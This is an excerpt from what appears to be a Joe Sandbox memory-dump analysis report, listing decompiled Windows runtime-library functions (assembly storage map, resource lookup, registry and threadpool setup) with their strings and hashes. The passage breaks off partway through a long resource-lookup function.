0x04d0e990
0x00000000
0x04d0e990
0x00000000
0x04cb04fb
0x04cb04dc
0x04cb04e2
0x04cb05d6
0x04cb05dc
0x04cb04e8
0x04cb04e8
0x04cb04e8
0x04cb04ed
0x00000000

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 04CB0586
kLsE, xrefs: 04CB05FE

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 2b334c6458eaa5f14dcbdb9811602ea53b185e9662e5d8e60ce6d6b1568c570c
Instruction ID: 0e2b39ebbe019c7a92082d152059c7dcc0df91c097c697a5da4e715ea0636f2f
Opcode Fuzzy Hash: 2b334c6458eaa5f14dcbdb9811602ea53b185e9662e5d8e60ce6d6b1568c570c
Instruction Fuzzy Hash: B251DE71A00706DFDB24DFA6C4406EBB7E6AF45304F04883ED9D693640E734B608CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04CE2DBC Relevance: 2.6, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04CE2DBC(void* __ecx, signed int __edx, signed short* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _t37;
				void* _t54;
				signed int* _t56;
				void* _t58;
				intOrPtr _t66;
				signed int _t69;
				void* _t70;
				signed int _t73;
				signed short* _t74;
				void* _t75;
				signed int* _t76;

				_t74 = _a4;
				_t54 = __ecx;
				_t37 = __edx;
				_t73 = 0;
				_v12 = __edx;
				if(__ecx == 0 || __edx < 1 || __edx >  *((intOrPtr*)(__ecx + 4))) {
					_t56 = _a8;
					goto L17;
				} else {
					if(_t74 == 0) {
						_t56 = _a8;
						L20:
						_v8 = _v8 & _t73;
						L21:
						if(_t74 == 0) {
							_v12 = _v12 & _t73;
						} else {
							_v12 =  *_t74 & 0x0000ffff;
						}
						if(_t54 == 0) {
							_t66 = 0;
						} else {
							_t66 =  *((intOrPtr*)(_t54 + 4));
						}
						_push(_t56);
						_push(_v8);
						_push(_v12);
						_push(_t74);
						_push(_t66);
						_push(_t37);
						_push(_t54);
						E04D3EF10(0x33, 0, "SXS: %s() bad parameters\nSXS:  Map                    : %p\nSXS:  AssemblyRosterIndex    : 0x%lx\nSXS:  Map->AssemblyCount     : 0x%lx\nSXS:  StorageLocation        : %p\nSXS:  StorageLocation->Length: 0x%x\nSXS:  StorageLocation->Buffer: %p\nSXS:  OpenDirectoryHandle    : %p\n", "RtlpInsertAssemblyStorageMapEntry");
						_t75 = 0xc000000d;
						L12:
						if(_t73 != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t73);
						}
						L13:
						return _t75;
					}
					_t69 =  *_t74 & 0x0000ffff;
					_t58 = 2;
					_t56 = _a8;
					if(_t69 < _t58 || _t74[2] == 0 || _t56 == 0) {
						L17:
						if(_t74 == 0) {
							goto L20;
						}
						_v8 = _t74[2];
						goto L21;
					} else {
						_t59 = _t69;
						if(_t69 + 2 > 0xfffe) {
							_t75 = 0xc0000106;
							goto L13;
						}
						_t73 = E04CC5D90(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t59 + 0x12);
						if(_t73 == 0) {
							_t75 = 0xc0000017;
							goto L13;
						}
						 *_t73 =  *_t73 & 0x00000000;
						_t9 = _t73 + 0x10; // 0x10
						 *(_t73 + 4) =  *_t74;
						 *((intOrPtr*)(_t73 + 8)) = _t9;
						_t70 = 2;
						 *((short*)(_t73 + 6)) =  *_t74 + _t70;
						E04CF88C0(_t9, _t74[2],  *_t74 & 0x0000ffff);
						_t76 = _a8;
						 *((short*)( *((intOrPtr*)(_t73 + 8)) + (( *(_t73 + 4) & 0x0000ffff) >> 1) * 2)) = 0;
						 *(_t73 + 0xc) =  *_t76;
						asm("lock cmpxchg [edx], ecx");
						if(0 == 0) {
							_t73 = 0;
							 *_t76 =  *_t76 & 0;
						}
						_t75 = 0;
						goto L12;
					}
				}
			}

0x04ce2dc6
0x04ce2dc9
0x04ce2dcc
0x04ce2dce
0x04ce2dd0
0x04ce2dd5
0x04d225d7
0x00000000
0x04ce2ded
0x04ce2def
0x04d225e6
0x04d225e9
0x04d225e9
0x04d225ec
0x04d225ee
0x04d225f8
0x04d225f0
0x04d225f3
0x04d225f3
0x04d225fd
0x04d22604
0x04d225ff
0x04d225ff
0x04d225ff
0x04d22606
0x04d22607
0x04d2260a
0x04d2260d
0x04d2260e
0x04d2260f
0x04d22610
0x04d2261f
0x04d22627
0x04ce2ea0
0x04ce2ea2
0x04d2263e
0x04d2263e
0x04ce2ea9
0x04ce2eae
0x04ce2eae
0x04ce2df5
0x04ce2dfa
0x04ce2dfe
0x04ce2e01
0x04d225da
0x04d225dc
0x00000000
0x00000000
0x04d225e1
0x00000000
0x04ce2e18
0x04ce2e18
0x04ce2e22
0x04d225cd
0x00000000
0x04d225cd
0x04ce2e3b
0x04ce2e3f
0x04ce2eb1
0x00000000
0x04ce2eb1
0x04ce2e41
0x04ce2e44
0x04ce2e4a
0x04ce2e50
0x04ce2e56
0x04ce2e5a
0x04ce2e66
0x04ce2e77
0x04ce2e7c
0x04ce2e85
0x04ce2e92
0x04ce2e98
0x04ce2e9a
0x04ce2e9c
0x04ce2e9c
0x04ce2e9e
0x00000000
0x04ce2e9e
0x04ce2e01

Strings

SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 04D22616
RtlpInsertAssemblyStorageMapEntry, xrefs: 04D22611

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
API String ID: 0-2104531740
Opcode ID: 0f0d9b5eb6042fab51fe64915daae6942ba283f70be85e927d42c373ea9043b6
Instruction ID: 4f1fd47984b3b6525e5e55c0943519a022efe8ac233d793dd04e8d994866ed57
Opcode Fuzzy Hash: 0f0d9b5eb6042fab51fe64915daae6942ba283f70be85e927d42c373ea9043b6
Instruction Fuzzy Hash: 6541D372600222EBDB24CF45C954B7AB3B6FFA4B14F14C0A9F9449B640E731F941DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04CBA1E3 Relevance: 2.6, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CBA1E3(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				short _v22;
				char _v24;
				char* _v28;
				short _v30;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t34;
				short _t35;
				signed int* _t37;
				signed char* _t38;
				signed int _t39;
				signed char* _t40;
				intOrPtr* _t43;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t49;
				signed int _t53;
				signed char* _t58;
				short _t61;
				intOrPtr* _t63;
				intOrPtr _t68;
				signed int _t71;
				signed int _t72;

				_v16 = __edx;
				_t72 = 0;
				_t68 = __ecx;
				_v8 = 0;
				_t61 = 0x42;
				_t34 = 0x44;
				_v22 = _t34;
				_t58 = 0x7ffe0385;
				_t35 = 0x40;
				_v32 = _t35;
				_v12 = __ecx;
				_v24 = _t61;
				_v20 = L"RtlpResUltimateFallbackInfo Enter";
				_t37 =  *( *[fs:0x30] + 0x50);
				_v30 = _t61;
				_v28 = L"RtlpResUltimateFallbackInfo Exit";
				if(_t37 != 0) {
					__eflags =  *_t37;
					if(__eflags == 0) {
						goto L1;
					}
					_t38 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					_t73 = 0x7ffe0384;
					if(( *_t38 & 0x00000001) != 0) {
						_t39 = E04CC3C40();
						__eflags = _t39;
						if(_t39 == 0) {
							_t40 = 0x7ffe0384;
						} else {
							_t40 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E04D3FC01( &_v24,  *_t40 & 0x000000ff);
						_t68 = _v12;
					}
					if(_t68 == 0) {
						L28:
						return 0xc000000d;
					} else {
						_t43 = _a4;
						if(_t43 == 0) {
							goto L28;
						}
						_t63 = _a8;
						_t79 = _t63;
						if(_t63 == 0) {
							goto L28;
						}
						 *_t43 = _t72;
						 *_t63 = _t72;
						_t45 = E04CBB5E0(_t58, _t72, _t73, _t79, _t68, _v16,  &_v8, _a12, 1);
						if(_t45 >= 0) {
							_t46 = _v8;
							__eflags = _t46;
							if(_t46 == 0) {
								L17:
								_t72 = 0xc0000001;
								L14:
								_t47 = E04CC3C40();
								__eflags = _t47;
								if(_t47 != 0) {
									_t58 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
								}
								__eflags =  *_t58 & 0x00000001;
								if(( *_t58 & 0x00000001) != 0) {
									_t49 = E04CC3C40();
									__eflags = _t49;
									if(_t49 != 0) {
										_t73 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
									}
									E04D3FC01( &_v32,  *_t73 & 0x000000ff);
									goto L16;
								} else {
									L16:
									return _t72;
								}
							}
							__eflags = _t46 - 0xffffffff;
							if(_t46 == 0xffffffff) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t46 + 0x7c)) - _t72;
							if( *((intOrPtr*)(_t46 + 0x7c)) == _t72) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t46 + 0x80)) - _t72;
							if( *((intOrPtr*)(_t46 + 0x80)) == _t72) {
								goto L17;
							}
							_t71 =  *(_t46 + 0x18);
							__eflags = _t71;
							if(_t71 == 0) {
								goto L17;
							}
							_t53 = _t46 +  *((intOrPtr*)(_t46 + 0x7c));
							__eflags = _t53;
							 *_a8 = _t71;
							 *_a4 = _t53;
							goto L14;
						}
						return _t45;
					}
				}
				L1:
				_t38 = _t58;
				goto L2;
			}

0x04cba1f0
0x04cba1f3
0x04cba1f5
0x04cba1f7
0x04cba1fa
0x04cba1fd
0x04cba1fe
0x04cba202
0x04cba209
0x04cba20a
0x04cba214
0x04cba217
0x04cba21b
0x04cba222
0x04cba225
0x04cba229
0x04cba232
0x04d12965
0x04d12967
0x00000000
0x00000000
0x04d12976
0x04cba23a
0x04cba23d
0x04cba242
0x04d12980
0x04d12985
0x04d12987
0x04d12999
0x04d12989
0x04d12992
0x04d12992
0x04d129a1
0x04d129a6
0x04d129a6
0x04cba24a
0x04d129ea
0x00000000
0x04cba250
0x04cba250
0x04cba255
0x00000000
0x00000000
0x04cba25b
0x04cba25e
0x04cba260
0x00000000
0x00000000
0x04cba26b
0x04cba274
0x04cba277
0x04cba27e
0x04cba287
0x04cba28a
0x04cba28c
0x04cba2ce
0x04cba2ce
0x04cba2b4
0x04cba2b4
0x04cba2b9
0x04cba2bb
0x04d129b7
0x04d129b7
0x04cba2c1
0x04cba2c4
0x04d129c2
0x04d129c7
0x04d129c9
0x04d129d4
0x04d129d4
0x04d129d4
0x04d129e0
0x00000000
0x04cba2ca
0x04cba2ca
0x00000000
0x04cba2ca
0x04cba2c4
0x04cba28e
0x04cba291
0x00000000
0x00000000
0x04cba293
0x04cba296
0x00000000
0x00000000
0x04cba298
0x04cba29e
0x00000000
0x00000000
0x04cba2a0
0x04cba2a3
0x04cba2a5
0x00000000
0x00000000
0x04cba2aa
0x04cba2aa
0x04cba2ad
0x04cba2b2
0x00000000
0x04cba2b2
0x04cba284
0x04cba284
0x04cba24a
0x04cba238
0x04cba238
0x00000000

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 04CBA229
RtlpResUltimateFallbackInfo Enter, xrefs: 04CBA21B

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 49ec54952e6123935ccf7820405d04a34a2e388c386528ef116a5043b5b158b5
Instruction ID: 374f71cca157bb2126444679f9d9edfec90dcbed219b03f05b53666feec4ade8
Opcode Fuzzy Hash: 49ec54952e6123935ccf7820405d04a34a2e388c386528ef116a5043b5b158b5
Instruction Fuzzy Hash: F441B130740645EBDB15CF59E440BBA77B5FF46714F1440A9EC88EB2A0E637EA00DB51

Uniqueness

Uniqueness Score: -1.00%

Function 04CF0F16 Relevance: 2.6, Strings: 2, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04CF0F16(void* __ecx, intOrPtr* _a4) {
				signed int _v12;
				char _v16;
				char _v24;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _t52;
				void* _t53;
				void* _t54;

				_t49 = __ecx;
				_v12 = _v12 | 0xffffffff;
				_t52 = 0;
				_t48 = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x1000);
				if(_t25 == 0) {
					return 0xc0000017;
				}
				E04CF5050(_t49,  &_v24, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control");
				_v56 = 0x18;
				_v48 =  &_v24;
				_push( &_v56);
				_push(0x20019);
				_v52 = 0;
				_push( &_v12);
				_v44 = 0x40;
				_v40 = 0;
				_v36 = 0;
				_t54 = E04CF2AB0();
				if(_t54 >= 0) {
					_t53 = E04CC5D90(_t49,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x10);
					if(_t53 == 0) {
						_t54 = 0xc0000017;
						_t52 = 0;
					} else {
						E04CF1291(_t48);
						E04CF5050(_t48,  &_v32, _t48);
						_push( &_v16);
						_push(0x10);
						_push(_t53);
						_push(2);
						_push( &_v32);
						_push(_v12);
						_t54 = E04CF2B00();
						if(_t54 >= 0) {
							 *_a4 =  *((intOrPtr*)(_t53 + 0xc));
						}
						_t52 = 0;
						E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
					}
					_push(_v12);
					E04CF2A80();
				}
				E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t48);
				return _t54;
			}

0x04cf0f16
0x04cf0f24
0x04cf0f30
0x04cf0f3b
0x04cf0f3f
0x00000000
0x04d2998c
0x04cf0f4e
0x04cf0f56
0x04cf0f5d
0x04cf0f63
0x04cf0f64
0x04cf0f6c
0x04cf0f6f
0x04cf0f70
0x04cf0f77
0x04cf0f7a
0x04cf0f82
0x04cf0f86
0x04cf0f99
0x04cf0f9d
0x04cf1005
0x04cf100a
0x04cf0f9f
0x04cf0fa4
0x04cf0fae
0x04cf0fb6
0x04cf0fb7
0x04cf0fb9
0x04cf0fba
0x04cf0fbf
0x04cf0fc0
0x04cf0fc8
0x04cf0fcc
0x04d2999c
0x04d2999c
0x04cf0fd9
0x04cf0fdf
0x04cf0fdf
0x04cf0fe4
0x04cf0fe7
0x04cf0fe7
0x04cf0ff7
0x00000000

Strings

@, xrefs: 04CF0F70
\Registry\Machine\System\CurrentControlSet\Control, xrefs: 04CF0F45

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: @$\Registry\Machine\System\CurrentControlSet\Control
API String ID: 2994545307-2976085014
Opcode ID: 6a66d930b472c4504e94943214859c78fe6a47fd6de534245fe77b2e6dbac46a
Instruction ID: dcddfbde63b8985671da0adab7fff2929f78375273ad830bfd17689523de21a3
Opcode Fuzzy Hash: 6a66d930b472c4504e94943214859c78fe6a47fd6de534245fe77b2e6dbac46a
Instruction Fuzzy Hash: CF319372A00258BBDB21EF95CD54E9FBBBAEB84B14F004065F601A7250DB38ED01D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04CEA4F0 Relevance: 2.5, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E04CEA4F0() {
				char _v1052;
				signed int _v1056;
				void* __ebp;
				intOrPtr _t12;
				void* _t15;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t29;

				_push(L"Cleanup Group");
				_push(L"Threadpool!");
				_push(0);
				_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
				_t12 = E04CEA580(_t22, _t23, _t24, _t25, _t29);
				_v1056 = _v1056 & 0x00000000;
				 *0x4da6644 = _t12;
				_push( &_v1056);
				_push(0x408);
				_push( &_v1052);
				_push(0x37);
				_t15 = E04CF2D10();
				if(_t15 >= 0) {
					if(_v1056 < 4) {
						return 0xc00000e5;
					}
					 *0x4da6640 = _v1052 + 1;
					_t19 =  *[fs:0x30];
					 *(_t19 + 0x250) =  *(_t19 + 0x250) & 0x00000000;
					_t20 = _t19 + 0x254;
					 *((intOrPtr*)(_t20 + 4)) = _t20;
					 *_t20 = _t20;
					return 0;
				}
				return _t15;
			}

0x04cea504
0x04cea509
0x04cea50e
0x04cea510
0x04cea513
0x04cea518
0x04cea51d
0x04cea526
0x04cea527
0x04cea530
0x04cea531
0x04cea533
0x04cea53a
0x04cea541
0x00000000
0x04cea56a
0x04cea548
0x04cea54d
0x04cea553
0x04cea55a
0x04cea55f
0x04cea562
0x00000000
0x04cea564
0x04cea569

Strings

Cleanup Group, xrefs: 04CEA504
Threadpool!, xrefs: 04CEA509

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 8c900f73979ee1c106f7d3003b05dfbc83bbd79dddca170b05f5a54d7cc8ced8
Instruction ID: 04e5432ec82d6107a3145fd236e20ab3345f42e0c2f0090441f8b27433022bc3
Opcode Fuzzy Hash: 8c900f73979ee1c106f7d3003b05dfbc83bbd79dddca170b05f5a54d7cc8ced8
Instruction Fuzzy Hash: 1F01D1B2651B00AFE311DF14CE09B2277E9E780B19F0989BAA658C75A0E779E900CB45

Uniqueness

Uniqueness Score: -1.00%

Function 04CBC6E0 Relevance: 2.2, Strings: 1, Instructions: 960
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04CBC6E0(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed short _v64;
				char _v65;
				signed int _v72;
				signed int _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int* _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* _v140;
				signed char _v144;
				signed int _v148;
				signed int _v152;
				char _v153;
				signed char _v160;
				signed int _v164;
				void* _v168;
				signed int _v172;
				signed short _v176;
				signed short _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _v196;
				signed int _v200;
				char _v204;
				intOrPtr _v208;
				signed int _v212;
				char _v220;
				char _v228;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t428;
				signed int _t429;
				signed int _t435;
				signed char _t437;
				signed int _t443;
				signed int _t446;
				signed char _t448;
				signed int _t461;
				signed int _t463;
				signed int _t465;
				signed short _t475;
				signed int _t478;
				signed int* _t480;
				signed int _t481;
				signed short _t482;
				signed int _t486;
				signed char _t488;
				signed int _t501;
				signed int _t503;
				signed int _t509;
				signed int _t510;
				signed int _t520;
				signed int _t536;
				signed int _t537;
				signed int _t539;
				signed int _t540;
				signed int _t543;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t555;
				void* _t556;
				signed int _t559;
				signed int _t565;
				signed char _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t573;
				signed short _t576;
				char _t581;
				signed int _t583;
				signed int _t587;
				signed int _t588;
				signed int _t592;
				intOrPtr _t598;
				signed int _t599;
				signed int _t601;
				signed int* _t602;
				signed int _t607;
				signed int _t615;
				signed int _t617;
				signed int _t620;
				signed int _t624;
				void* _t625;
				signed int _t626;
				signed int _t627;
				intOrPtr* _t630;
				intOrPtr _t633;
				signed int _t638;
				void* _t639;
				signed char _t640;
				intOrPtr* _t642;
				signed int _t645;
				signed int _t647;
				void* _t648;

				_t612 = __edx;
				_push(0xfffffffe);
				_push(0x4d8c008);
				_push(E04CFAD20);
				_push( *[fs:0x0]);
				_t428 =  *0x4dab370;
				_v12 = _v12 ^ _t428;
				_t429 = _t428 ^ _t647;
				_v32 = _t429;
				_push(_t429);
				 *[fs:0x0] =  &_v20;
				_v28 = _t648 - 0xd0;
				_v100 = __edx;
				_t624 = __ecx;
				_v96 = __ecx;
				_v152 = __edx;
				_v108 = _a12;
				_v92 = __edx;
				_v65 = 0;
				_v172 = 0;
				_v164 = 0;
				_t638 = _a4;
				_t555 = _a8;
				if(_t638 >= 3 || (_t555 & 0x00000002) != 0) {
					if(_t638 > 4) {
						goto L232;
					}
					_t435 = _t555 & 0x00000041;
					if(_t435 == 0 || _t638 == 4) {
						if(_t638 != 4) {
							L9:
							_t565 = _t638;
							_v88 = _t638;
							L10:
							_v124 = _t565;
							_v8 = 0;
							_t437 =  !_t555;
							_v144 = _t437;
							if((_t437 & 0x00000010) == 0) {
								L25:
								_v80 = 1;
								_t566 = _v96;
								_t640 = _t566;
								_v160 = _t566;
								_v120 = 0;
								_t626 = 0;
								_v128 = 0;
								if((_t566 & 0x00000003) != 0) {
									asm("sbb al, al");
									_v80 =  !( ~(_t566 & 0x00000001)) & 0x00000001;
									_v160 = _t640;
								}
								_t612 = E04CBE580(1, _t640, 0, 0,  &_v120);
								_t567 = _v120;
								if(_t567 == 0) {
									L76:
									if(_t612 >= 0) {
										L79:
										_v188 = _t626;
										if(_t626 != 0) {
											_t432 = E04CBAB70(_t555, _t626, _t640, __eflags, _v96,  &_v172, 0x100, 1);
											_v72 = _t432;
											__eflags = _t432;
											if(_t432 < 0) {
												L68:
												_v8 = 0xfffffffe;
												goto L233;
											}
											_v148 = _t626;
											_v76 = 0xeeee;
											_v116 = 0;
											_t568 = 0;
											_v136 = 0;
											_v132 = 0;
											_v64 = 0;
											__eflags = 0;
											_v84 = 0;
											_v168 = 0;
											while(1) {
												__eflags = _t626;
												if(_t626 == 0) {
													goto L90;
												}
												_t481 = _v124;
												_t617 = _t481 - 1;
												_v124 = _t617;
												__eflags = _t481;
												if(_t481 == 0) {
													goto L90;
												}
												__eflags = _t617;
												_t612 = _v88;
												if(_t617 == 0) {
													__eflags = _t612 - 3;
													if(_t612 == 3) {
														_v132 = _t626;
													}
												}
												__eflags = _v132;
												if(_v132 == 0) {
													L169:
													_t576 =  *(_t626 + 0xe) & 0x0000ffff;
													_v176 = _t576;
													_v180 =  *(_t626 + 0xc) & 0x0000ffff;
													_t612 = _t576 & 0x0000ffff;
													_t432 = E04CA94A3( *(_t626 + 0xc) & 0xffff, _t576 & 0x0000ffff,  &_v204);
													_v72 = _t432;
													__eflags = _t432;
													if(_t432 < 0) {
														goto L68;
													}
													_t612 = 8;
													_t432 = E04D06D10(_v204, 8,  &_v220);
													_v72 = _t432;
													__eflags = _t432;
													if(_t432 < 0) {
														goto L68;
													}
													_t306 = _t626 + 0x10; // 0x10
													_t612 = _t306;
													_v212 = _t612;
													_t629 = _v96;
													_t581 = (_v96 & 0xfffffffc) + _v172;
													_v140 = _t581;
													__eflags = _v220 + _t612 - _t581;
													if(_v220 + _t612 <= _t581) {
														_t475 = _v180;
														_v144 = _t475;
														_t583 =  *_v100;
														__eflags = _t583 & 0xffff0000;
														if((_t583 & 0xffff0000) == 0) {
															_t612 = _t612 + (_t475 & 0x0000ffff) * 8;
															_v212 = _t612;
															_t475 = _v176;
															_v144 = _t475;
														}
														__eflags = _t475;
														if(_t475 != 0) {
															__eflags = _v132;
															if(_v132 == 0) {
																L206:
																_t612 = _v172;
																_t478 = E04D06E26(_t629, _v172, _v144, _v188, _v172, _t583,  &_v148,  &_v136);
																__eflags = _t478;
																if(_t478 == 0) {
																	goto L172;
																}
																_t480 =  &(_v100[1]);
																_v100 = _t480;
																_v152 = _t480;
																_t626 = _v148;
																_t568 = _v136;
																continue;
															}
															__eflags = _t555 & 0x00000020;
															if((_t555 & 0x00000020) == 0) {
																goto L206;
															}
															_t626 = 0;
															_v148 = 0;
															_v76 =  *_t612;
															_t568 =  *((intOrPtr*)(_t612 + 4)) + _v188;
															__eflags = _t568 - _v140;
															if(_t568 > _v140) {
																goto L172;
															}
															_v136 = _t568;
															goto L90;
														} else {
															_t587 = _v88;
															_t486 = _t587 - _v124 - 1;
															__eflags = _t486;
															if(_t486 == 0) {
																_t645 = 0xc000008a;
																L183:
																_v72 = _t645;
																_t630 = _v92;
																__eflags = _t555 & 0x02040000;
																if((_t555 & 0x02040000) != 0) {
																	L191:
																	__eflags = _t645 - 0xc000008a;
																	if(_t645 == 0xc000008a) {
																		L193:
																		_t488 =  !_t555;
																		__eflags = _t488 & 0x00080000;
																		if((_t488 & 0x00080000) != 0) {
																			__eflags = _t488 & 0x00020000;
																			if((_t488 & 0x00020000) != 0) {
																				__eflags = _t488 & 0x00000010;
																				if((_t488 & 0x00000010) != 0) {
																					__eflags = _t587 - 3;
																					if(_t587 == 3) {
																						_v48 =  *_t630;
																						_v44 =  *((intOrPtr*)(_t630 + 4));
																						_v40 =  *((intOrPtr*)(_t630 + 8));
																						_t588 = _a4;
																						__eflags = _t588 - 4;
																						if(_t588 == 4) {
																							_v36 =  *((intOrPtr*)(_t630 + 0xc));
																						}
																						_t612 =  &_v48;
																						_t558 = _v96;
																						_t645 = E04CBB9C0(_v96,  &_v48, _t588, _t555, _v108);
																						_v72 = _t645;
																						__eflags = _t645;
																						if(_t645 >= 0) {
																							_t612 = 0;
																							__eflags = 0;
																							E04CB0C12(_t558, 0,  &_v48, _a4);
																						}
																					}
																				}
																			}
																		}
																		L201:
																		_v8 = 0xfffffffe;
																		_t432 = _t645;
																		goto L233;
																	}
																	__eflags = _t645 - 0xc000008b;
																	if(_t645 != 0xc000008b) {
																		goto L201;
																	}
																	goto L193;
																}
																__eflags = _t587 - 3;
																if(_t587 != 3) {
																	goto L191;
																}
																_v48 =  *_t630;
																_v44 =  *((intOrPtr*)(_t630 + 4));
																_v40 =  *((intOrPtr*)(_t630 + 8));
																_t592 = _a4;
																__eflags = _t592 - 4;
																if(_t592 == 4) {
																	_v36 =  *((intOrPtr*)(_t630 + 0xc));
																}
																_t612 =  &_v48;
																_t501 = E04CBB9C0(_v96,  &_v48, _t592, _t555 | 0x01000000, _v108);
																_t587 = _v88;
																__eflags = _t501 - 0xc00b0001;
																if(_t501 != 0xc00b0001) {
																	__eflags = _t501 - 0xc00b0006;
																	if(_t501 == 0xc00b0006) {
																		goto L191;
																	}
																	_t645 = _t501;
																	L190:
																	_v72 = _t645;
																}
																goto L191;
															}
															_t503 = _t486 - 1;
															__eflags = _t503;
															if(_t503 == 0) {
																_t645 = 0xc000008b;
																goto L183;
															}
															__eflags = _t503 == 1;
															if(_t503 == 1) {
																_v72 = 0xc0000204;
																_v8 = 0xfffffffe;
																_t432 = 0xc0000204;
																goto L233;
															}
															_t645 = 0xc000000d;
															_t630 = _v92;
															goto L190;
														}
													}
													L172:
													_v8 = 0xfffffffe;
													_t432 = 0xc000007b;
													goto L233;
												} else {
													_v64 = 0;
